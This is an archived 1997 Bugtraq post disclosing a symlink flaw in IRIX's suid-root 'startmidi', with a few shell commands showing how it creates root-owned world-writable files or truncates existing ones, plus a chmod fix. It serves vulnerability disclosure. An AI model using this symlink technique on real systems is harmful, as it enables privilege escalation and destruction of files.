Bugtraq mailing list archives
IRIX: Bug in startmidi
From: hedley () CS BRIS AC UK (David Hedley)
Date: Sun, 9 Feb 1997 18:11:45 +0000
Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I noticed a little suid-root program called 'startmidi' which hides in /usr/sbin. When run, this program creates various files in /tmp. You guessed it, it respects umask and follows symlinks. Comme ca: % umask 0 % ln -s /blardyblar /tmp/.midipid % startmidi -d /dev/ttyd1 % ls -l /blardyblar -rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar % stopmidi -d /dev/ttyd1 % Any existing files are trucated to zero length. New files are created root-owned, mode 0666. I leave it to your furtive imaginations to get root from this. 'stopmidi' removes the files created by 'startmidi' so you may have to run that first if /tmp/.midipid already exists. chmod -s /usr/sbin/startmidi fixes this problem. My apologies if this has been documented before but I couldn't find it anywhere on file and I don't remember it being posted to this list. Regards, David -- David Hedley (hedley () cs bris ac uk) finger hedley () cs bris ac uk for PGP key Computer Graphics Group | University of Bristol | UK
Current thread:
- Re: [linux-security] Re: Linux virus, (continued)
- Re: [linux-security] Re: Linux virus Alan Cox (Feb 05)
- Re: [linux-security] Re: Linux virus Leejay Wu (Feb 05)
- bliss version 0.4.0 nobody () INTERNIC NET (Feb 05)
- HPSBUX9702-052 Security Vulnerability in the rlogin executable Aleph One (Feb 05)
- [linux-security] Re: Linux virus Aleph One (Feb 06)
- setlocale() bug in all released versions of FreeBSD (SA-97:01) Aleph One (Feb 06)
- Wierd behavior of MS's NT4 DNS Jason T. Luttgens (Feb 07)
- New OFFICIAL patch for BSD/OS 2.1 (*SECURITY*) (fwd) Josh Gilliam (Feb 07)
- Bliss: The Facts Jared Mauch (Feb 08)
- view-source myst (Feb 08)
- IRIX: Bug in startmidi David Hedley (Feb 09)
- Re: IRIX: Bug in startmidi Nafees Bin Zafar (Feb 09)
- Security Advisory: A simple TCP spoofing attack Oliver Friedrichs (Feb 09)
- Re: Security Advisory: A simple TCP spoofing attack Wietse Venema (Feb 12)
- buffer overflow in configurable fingerd? M Shariful Anam (Feb 12)
- Re: buffer overflow in configurable fingerd? Ken Hollis (Feb 12)
- Security Bulletins Digest Aleph One (Feb 13)
- Linux NLSPATH buffer overflow solar () IDEAL RU (Feb 13)
- Re: Linux NLSPATH buffer overflow Alan Cox (Feb 14)
- CIAC Bulletin H-27: HP-UX vgdisplay Buffer Overrun Vulnerability Aleph One (Feb 15)
- screen 3.05.02 Khelbin Sunvold (Feb 15)